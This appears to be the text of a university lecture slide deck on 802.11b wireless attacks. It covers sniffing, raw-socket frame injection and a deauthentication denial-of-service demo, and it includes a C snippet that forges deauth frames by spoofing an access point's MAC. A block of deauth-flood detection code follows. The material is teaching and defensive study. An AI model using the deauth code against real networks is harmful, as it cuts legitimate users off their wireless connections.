
802.11 Attack Demo - PowerPoint PPT Presentation



802.11 Attack Demo

Haobo Zhou

([email protected])

L I A C S

http://www.liacs.nl/home/hzhou


What Will Be Covered

  • Overview of 802.11b

  • Wireless network sniffer

  • Frame Injection

  • Deauth/Disassociation Attack

  • Attack Demo


NO!!

Thanks

OK

!!

Dinner??


ISO OSI Model and 802.11b

Overview of 802.11b

Obtained From http://alpha.fdu.edu/~kanoksri/IEEE80211b.html


Overview of 802.11b

  • Runs over 2.4 GHz

    • DSSS - Direct Sequence Spread Spectrum

    • Channels

      • FCC (US) - 11 Channels (1-11)

      • ETSI (EU) - 13 Channels (1-13)

      • France - 4 Channels (10-13)

      • Japan - 14 Channels (1-14)

    • Uses CSMA/CA


Overview of 802.11b

  • Uses WEP for Encryption

    • “Wired Equivalent Privacy”

    • Uses RC4

    • 40-bit or 104-bit static key with 24-bit IV


Overview of 802.11b

  • Consists of 3 main protocol types

    • Management

    • Control

    • Data



Overview of 802.11b

Infrastructure


Overview of 802.11b

[Diagram: frames exchanged between Node and Access Point, in order]

  • Beacon

  • Authentication Req

  • Authentication Resp

  • Association Req

  • Association Resp

Access Point accepts Node; Node is associated.


Wireless network sniffer

Wireless Network Detection

  • NIC with monitor mode support

    • Why?

      • Management frames

      • Frames that belong to others

  • Tools

    • Kismet

    • others


Wireless network sniffer

Network Interface Card Modes

  • Managed (Infrastructure)

  • Ad-Hoc (Ad Hoc)

  • Monitor (hardware support??)

  • Master (acts as an AP)


Wireless network sniffer

  • KISMET

    • An 802.11 layer 2 wireless network sniffer

    • Works on Linux

    • Ethereal/Tcpdump compatible data logging

    • Over 20 supported card types

    • Open source code



Frame Injection

  • NIC

    • support ?

  • Device Driver

    • support frame injection?

      • Yes- very good

      • NO- Change it!

  • User program


Frame Injection

  • User program

    • C code on Linux

    • RAW socket programming

      • Use PF_PACKET interface to access the link layer

      • sd=socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL));


Deauthentication Attack

  • Management frames can control link characteristics and physical medium properties

  • 802.11b management frames are NOT authenticated

    • Why is this bad?


Deauthentication Attack

  • Denial of Service – De-authentication

    • Use MAC address of Access Point

    • Send deauthenticate frames

      • Send continuously

    • Users are unable to reassociate with AP


Deauthentication Attack

[State diagram]

  • State 1: Unauthenticated, Unassociated

  • State 2: Authenticated, Unassociated

  • State 3: Authenticated, Associated

Transitions

  • State 1 → State 2: Successful authentication

  • State 2 → State 3: Successful association

  • State 3 → State 2: Disassociation

  • State 2 → State 1 and State 3 → State 1: Deauthentication


Deauthentication Attack

Deauth frame structure


Deauthentication Attack

    void send_deauth(__u8 *dst, __u8 *bssid)
    {
        /* Management frame: three-address 802.11 header followed by the reason code */
        struct {
            struct a3_80211 hdr;
            __u16 reason;
        } mgt_frame;

        memset(&mgt_frame, 0, sizeof(mgt_frame));
        mgt_frame.hdr.mh_type = FC_TYPE_MGT;
        mgt_frame.hdr.mh_subtype = MGT_DEAUTH;
        memcpy(&(mgt_frame.hdr.mh_mac1), dst, 6);    /* destination */
        memcpy(&(mgt_frame.hdr.mh_mac2), bssid, 6);  /* source: the AP's MAC address */
        memcpy(&(mgt_frame.hdr.mh_mac3), bssid, 6);  /* BSSID */
        mgt_frame.reason = 2;                        /* previous authentication no longer valid */
        send(socket, &mgt_frame, sizeof(mgt_frame), 0);
    }
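Because these management frames are not authenticated, a monitoring station cannot tell a forged deauthenticate frame from a real one, but it can notice the continuous stream described above. The following C code is an added example, not part of the original slides: it parses the 802.11 management header and counts deauthentication/disassociation frames from one sender per time window. The threshold, window length, sample MAC address and all function names are assumptions.

```c
#include <stdint.h>
#include <string.h>
#define SUBTYPE_DISASSOC 10
#define SUBTYPE_DEAUTH   12
#define FLOOD_THRESHOLD  5      /* assumed: frames per window from one sender */
#define WINDOW_MS        1000   /* assumed window length */
struct mgmt_event  { uint8_t subtype; uint8_t addr[3][6]; uint16_t reason; }; /* DA, SA, BSSID */
struct flood_state { uint8_t sa[6]; uint32_t start_ms; unsigned count; };

/* Constructed sample: deauth to broadcast, SA = BSSID = 02:00:00:00:00:01, reason 2. */
static const uint8_t SAMPLE_DEAUTH[26] = {
    0xc0, 0x00, 0x00, 0x00,                /* frame control, duration */
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff,    /* addr1: destination */
    0x02, 0x00, 0x00, 0x00, 0x00, 0x01,    /* addr2: source */
    0x02, 0x00, 0x00, 0x00, 0x00, 0x01,    /* addr3: BSSID */
    0x00, 0x00, 0x02, 0x00 };              /* sequence control, reason code */

/* Raw 802.11 frame in (no radiotap, no FCS); 1 if deauth/disassoc, else 0. */
int parse_deauth(const uint8_t *f, size_t len, struct mgmt_event *ev)
{
    /* 24-byte header + 2-byte reason; low nibble 0 = version 0, type management */
    if (len < 26 || (f[0] & 0x0f) != 0) return 0;
    ev->subtype = f[0] >> 4;
    if (ev->subtype != SUBTYPE_DEAUTH && ev->subtype != SUBTYPE_DISASSOC) return 0;
    memcpy(ev->addr, f + 4, sizeof ev->addr);
    ev->reason = (uint16_t)(f[24] | (f[25] << 8));   /* little-endian */
    return 1;
}

/* Fixed-window counter for the most recent sender; 1 once it reaches the threshold. */
int flood_check(struct flood_state *st, const struct mgmt_event *ev, uint32_t now_ms)
{
    if (memcmp(st->sa, ev->addr[1], 6) != 0 || now_ms - st->start_ms >= WINDOW_MS) {
        memcpy(st->sa, ev->addr[1], 6);    /* new sender or new window: restart */
        st->start_ms = now_ms;
        st->count = 0;
    }
    return ++st->count >= FLOOD_THRESHOLD;
}

/* Replay the sample n times, gap_ms apart; index of the first alert, or -1. */
int first_alert(int n, uint32_t gap_ms)
{
    struct flood_state st = {0};
    struct mgmt_event ev;
    for (int i = 0; i < n; i++)
        if (parse_deauth(SAMPLE_DEAUTH, 26, &ev) && flood_check(&st, &ev, (uint32_t)i * gap_ms))
            return i;
    return -1;
}
```

In a real deployment the frames would come from a monitor-mode capture, and the counter would be kept per sender address rather than for a single one.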


Question ?

deauth-attack demo continues


802.11 Deauth-attack DEMO

Attacker

  • Hardware

    • Laptop

    • Wireless card

      • Atheros 5212 chip

      • Monitor mode support

  • Software

    • Device driver

      • Madwifi

      • Open source project

      • Two patches to enable frame injection

    • User program

      • Fata_jace.c

Victim

  • Hardware

    • Laptop

    • Wireless card

  • Software

    • Ping

      • Use ping to verify the connection


Thanks

  • Xu Li

  • Wei Wang

  • Google

